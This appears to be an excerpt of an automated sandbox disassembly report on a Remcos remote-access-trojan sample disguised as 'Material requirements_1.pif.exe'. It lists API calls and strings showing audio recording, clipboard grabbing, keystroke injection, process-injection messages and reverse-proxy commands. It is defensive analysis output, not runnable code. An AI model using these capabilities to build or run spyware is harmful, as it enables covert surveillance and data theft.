                        • __dosmaperr.LIBCMT ref: 00454AAD
                        • GetFileType.KERNEL32(00000000), ref: 00454AB9
                        • GetLastError.KERNEL32 ref: 00454AC3
                        • __dosmaperr.LIBCMT ref: 00454ACC
                        • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                        • CloseHandle.KERNEL32(?), ref: 00454C36
                        • GetLastError.KERNEL32 ref: 00454C68
                        • __dosmaperr.LIBCMT ref: 00454C6F
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                        • __dosmaperr.LIBCMT ref: 004393DD
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                        • __dosmaperr.LIBCMT ref: 0043941A
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                        • __dosmaperr.LIBCMT ref: 0043946E
                        • _free.LIBCMT ref: 0043947A
                        • _free.LIBCMT ref: 00439481
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                        • TranslateMessage.USER32(?), ref: 00404F30
                        • DispatchMessageA.USER32(?), ref: 00404F3B
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        APIs
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Similarity
                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                        • String ID: <$@$@FG$@FG$Temp
                        • API String ID: 1107811701-2245803885
                        APIs
                        • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                        • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\Material requirements_1.pif.exe), ref: 00406705
                        Similarity
                        • API ID: CurrentProcess
                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                        • API String ID: 2050909247-4145329354
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        APIs
                        • _free.LIBCMT ref: 00446DEF
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00446DFB
                        • _free.LIBCMT ref: 00446E06
                        • _free.LIBCMT ref: 00446E11
                        • _free.LIBCMT ref: 00446E1C
                        • _free.LIBCMT ref: 00446E27
                        • _free.LIBCMT ref: 00446E32
                        • _free.LIBCMT ref: 00446E3D
                        • _free.LIBCMT ref: 00446E48
                        • _free.LIBCMT ref: 00446E56
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        Similarity
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                        • API String ID: 3578746661-4192532303
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • Sleep.KERNEL32(00000064), ref: 00416688
                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                        Similarity
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        APIs
                        • _strftime.LIBCMT ref: 00401AD3
                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                        • API String ID: 3809562944-3643129801
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                        • waveInStart.WINMM ref: 00401A81
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID: XCG$`=G$x=G
                        • API String ID: 1356121797-903574159
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                          • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                          • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                          • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                        • TranslateMessage.USER32(?), ref: 0041CA0B
                        • DispatchMessageA.USER32(?), ref: 0041CA15
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                        Similarity
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                        • __alloca_probe_16.LIBCMT ref: 00452CA1
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                        • __alloca_probe_16.LIBCMT ref: 00452D4B
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                        • __freea.LIBCMT ref: 00452DBA
                        • __freea.LIBCMT ref: 00452DC6
                        Similarity
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 201697637-0
                        • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                        • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                        • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                        • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • _memcmp.LIBVCRUNTIME ref: 004446B3
                        • _free.LIBCMT ref: 00444724
                        • _free.LIBCMT ref: 0044473D
                        • _free.LIBCMT ref: 0044476F
                        • _free.LIBCMT ref: 00444778
                        • _free.LIBCMT ref: 00444784
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                        • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                        • Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                        • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                        • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                        • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                        • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                        • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                        • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                        • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                        APIs
                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                        • _wcslen.LIBCMT ref: 0041A906
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                        • API String ID: 37874593-703403762
                        • Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                        • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                        • Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                        • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                        • __alloca_probe_16.LIBCMT ref: 004499F2
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                        • __alloca_probe_16.LIBCMT ref: 00449AD7
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                        • __freea.LIBCMT ref: 00449B47
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • __freea.LIBCMT ref: 00449B50
                        • __freea.LIBCMT ref: 00449B75
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 3864826663-0
                        • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                        • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                        • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                        • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                        APIs
                        • SendInput.USER32 ref: 00418B18
                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                        • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                          • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InputSend$Virtual
                        • String ID:
                        • API String ID: 1167301434-0
                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                        • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                        • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                        APIs
                        • OpenClipboard.USER32 ref: 00415A46
                        • EmptyClipboard.USER32 ref: 00415A54
                        • CloseClipboard.USER32 ref: 00415A5A
                        • OpenClipboard.USER32 ref: 00415A61
                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                        • CloseClipboard.USER32 ref: 00415A89
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID:
                        • API String ID: 2172192267-0
                        • Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                        • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                        • Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                        • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16
                        • String ID: a/p$am/pm$fD
                        • API String ID: 3509577899-1143445303
                        • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                        • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                        • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                        • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                        APIs
                        • _free.LIBCMT ref: 00447ECC
                        • _free.LIBCMT ref: 00447EF0
                        • _free.LIBCMT ref: 00448077
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                        • _free.LIBCMT ref: 00448243
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                        • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                        • Opcode Fuzzy Hash: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                        • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                        • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                        • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                        • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                        APIs
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • _free.LIBCMT ref: 00444096
                        • _free.LIBCMT ref: 004440AD
                        • _free.LIBCMT ref: 004440CC
                        • _free.LIBCMT ref: 004440E7
                        • _free.LIBCMT ref: 004440FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID: Z7D
                        • API String ID: 3033488037-2145146825
                        • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                        • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                        • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                        • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                        APIs
                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                        • __fassign.LIBCMT ref: 0044A190
                        • __fassign.LIBCMT ref: 0044A1AB
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                        • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                        • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                        • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                        APIs
                        • ExitThread.KERNEL32 ref: 004017F4
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • __Init_thread_footer.LIBCMT ref: 004017BC
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: T=G$>G$>G
                        • API String ID: 1596592924-1617985637
                        • Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                        • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                        • Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                        • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                        APIs
                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
